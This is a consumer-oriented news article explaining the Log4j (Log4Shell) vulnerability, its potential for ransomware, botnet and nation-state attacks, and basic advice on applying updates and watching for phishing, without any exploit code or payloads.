The Log4j flaw: What it means and what you can do to protect yourself

woman looking shocked sitting at a computer
Photo 202602548 © Teerachat Aebwanawong | Dreamstime.com

Cyberattacks, for the most part, are usually low-level intrusions into personal computers or ill-protected business networks. But now and again, a massive hack demonstrates that no company or person is immune. Tap or click here to see how 400 million medical records got exposed in a massive data breach.

Do you remember the Stuxnet computer worm? It was unleashed in 2010 and used to infiltrate Iranian nuclear facilities.

It caused over 1,000 computers to physically shut down and degrade while infecting over 200,000 others. The worm caused billions of dollars in damage. And is widely believed to be the most significant nation-state attack on another country.

Sounds terrible, right? Over a decade later, there’s a new threat causing havoc — and we may not even see the full implications for years to come.

Here’s the backstory

Log4j is a free, open-source library software developers use to build records of online activities. This data can be used for functions like troubleshooting and data tracking. Because it’s free and easy to use, Log4J is in possibly millions of mobile apps and pieces of desktop software, along with just about every server on the planet.

The vulnerability — called Log4Shell — was detected late last week after an attack on the servers of the video game Minecraft. It’s rather difficult to wrap your head around how the exploit works, which is partly what makes it so dangerous. Log4J is used to look up data on a network. It interprets a text-based log message as a website URL — and, if instructed, can execute code without verifying the authority.

So, in short: A few lines of code in text messages between hackers can be enough to trigger the exploit. Once inside the attacked server, hackers have unrestricted access to the data stored on them.

Why is it so dangerous?

Log4Shell works differently than typical cybersecurity vulnerabilities. It requires no interaction from users and can be let loose in a system undetected. But the biggest difference is the reward for hackers.

Malware often targets personal data, but Log4Shell can be used for anything from corporate espionage to ransomware. It is also seemingly much easier to use than other attack methods. This high-reward and easy-to-use combination could have devastating effects on thousands of companies worldwide.

Microsoft has already been attacked, but companies like Apple, Amazon, Baidu, Google, IBM, Tesla, Twitter, and Steam all use Log4J in some form or another. Tech giant VMware issued a warning to its customers that many of its products are vulnerable, and Cisco confirmed it has already been impacted.

How bad can the hacks get?

Well, if the current statistics are anything to go by, we could be witnessing one of the biggest hacks in history. Cybersecurity company Kryptos Logic told Tech Crunch that it has already detected more than 10,000 separate IP addresses scanning the internet for the Log4Shell vulnerability.

Not only does the likelihood of ransomware increase, but the flaw can also be used for botnet attacks. By stringing millions of computers together in a giant network, hackers harness the collective power to launch more attacks.

Remember the nation-state malware Stuxnet? It appears Log4Shell could rival that.

Microsoft said the vulnerability is being used “by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey.” A “nation-state activity group” is usually a hacker collective supported by its home country.

What you can do about it

From a personal perspective, you must keep all your gadgets up to date with the latest security patches. Several affected companies have already patched their server or cloud networks, but others are still lagging.

Apple rolled out a patch to iCloud over the weekend, while anti-hacking provider Cloudflare updated its systems to prevent attacks. Apache Software Foundation, which maintains the Log4J logging framework, released an emergency security patch, too.

If you use a service or business that hasn’t fixed the vulnerability, there’s a chance that your data will be exposed. These kinds of attacks are often directed toward the company and not necessarily its users, but the risk is ever-present.

The devastating Equifax breach from 2017 comes to mind, caused by a similar attack method. The hackers managed to expose over 140 million customers’ data, putting all Equifax customers at risk of identity fraud, phishing attacks, or ransomware.

Unfortunately, other than making sure that your own devices are updated, there isn’t much else that you can do. Until all companies patch the vulnerability, there is no telling how long the threat will remain — or if it will ever go away.

🚨 What it means for you

We can’t understate what a big problem this is. Log4Shell impacts everything from services to security devices to the apps on your phone. That said, there’s not a ton you can do. As with any malware threat, you need to take steps to safeguard your accounts and keep your devices up to date.

✅ Make yourself an update list. It’s not just your smartphone or computer that needs regular updates. Check your tablets, streaming devices, smart home tech, router and anything that connects to the internet. Whenever you can, enable automatic updates so you’re not relying on your memory.

✅ Be on the lookout for phishing attacks. Cybercriminals latch onto vulnerabilities like this to scare you into giving up your information or even money. Only change your passwords or input information on a company’s official website — and don’t get there by clicking a link in an email or text.

Keep reading

Major ISP and cable company breached – And you’ll never believe how

GoDaddy data breach: 1.2M user profiles, including passwords, exposed

Tags: Apple, botnet, breaches, cyberattacks, cybercriminals, Equifax, hackers, malware, patch, phishing, ransomware, security, update, vulnerability